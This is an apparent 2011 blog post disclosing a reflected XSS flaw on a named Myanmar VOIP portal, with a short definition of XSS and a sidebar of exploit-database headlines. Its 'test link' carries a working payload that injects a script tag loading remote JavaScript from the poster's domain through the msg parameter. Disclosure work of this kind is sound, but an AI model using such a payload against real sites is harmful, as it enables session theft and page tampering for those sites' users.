critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Home / Hacking, News, Security / critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

September 28, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

[webapps] Flowise 3.0.4 - Remote Code Execution (RCE)
on October 31, 2025 at 12:00 am
Flowise 3.0.4 - Remote Code Execution (RCE)
[webapps] Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
on October 29, 2025 at 12:00 am
Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
[local] Mbed TLS 3.6.4 - Use-After-Free
on September 16, 2025 at 12:00 am
Mbed TLS 3.6.4 - Use-After-Free
[webapps] Concrete CMS 9.4.3 - Stored XSS
on September 16, 2025 at 12:00 am
Concrete CMS 9.4.3 - Stored XSS
[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
on September 16, 2025 at 12:00 am
XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)

critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Explore More

What are the various methods of passive OS fingerprinting?

What are the various features of snort?

Plecost: WordPress finger printer tool